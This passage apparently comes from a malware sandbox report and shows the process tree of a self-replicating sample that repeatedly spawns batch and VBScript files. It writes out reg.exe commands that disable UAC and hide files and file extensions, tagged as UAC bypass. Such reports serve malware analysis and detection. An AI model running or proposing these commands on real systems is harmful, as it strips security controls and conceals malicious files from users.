        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOQUEkcI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        114⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        Modifies registry key
        
        PID:3040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        115⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ICYUwEoA.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        112⤵
        
        PID:444
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        Modifies registry key
        
        PID:1724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        
        PID:64
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        Modifies registry key
        
        PID:4768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOMwsows.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        110⤵
        
        PID:3844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        111⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        Modifies registry key
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NIIUwAgQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        108⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:5000
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIMgAQsU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        106⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:4316
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUsUwgQs.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        104⤵
        
        PID:1284
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:4260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        Modifies registry key
        
        PID:3880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:1892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        
        PID:1376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYIQcsYY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        102⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        UAC bypass
        
        PID:2680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WAMwEQMA.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        100⤵
        
        PID:4236
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        UAC bypass
        
        PID:3852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GEQswMgY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        98⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        Modifies registry key
        
        PID:5116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        UAC bypass
        Modifies registry key
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        UAC bypass
        Modifies registry key
        
        PID:2200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GmwIgMUk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        96⤵
        
        PID:1808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        
        PID:1424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:2172
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\heYEcQMk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        94⤵
        
        PID:2420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        95⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:3084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vMUoAQMU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        92⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOcEoUMk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        90⤵
        
        PID:4960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        91⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        
        PID:496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HwoYMsII.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        88⤵
        
        PID:752
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:4940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        87⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EoYsgwUA.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        86⤵
        
        PID:3040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        87⤵
        UAC bypass
        
        PID:5096
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewgEEocU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        84⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:1688
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        85⤵
        UAC bypass
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        
        PID:2088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        83⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        Modifies registry key
        
        PID:936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oYMMYYQU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        82⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        
        PID:216
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEwkYwkU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        80⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DcEQgYss.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        78⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NwAMIcso.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        76⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:4524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        Modifies registry key
        
        PID:4688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        Modifies registry key
        
        PID:772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        75⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VYokMIYQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        74⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pmwUMAMI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        72⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        Modifies registry key
        
        PID:3344
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUIIgcME.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        70⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:4140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        
        PID:4336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        69⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeYwYYQQ.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        68⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EoEcYwQw.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        66⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        Modifies registry key
        
        PID:1804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        67⤵
        
        PID:244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        Modifies registry key
        
        PID:3292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YEcUEIYg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        64⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        
        PID:1948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
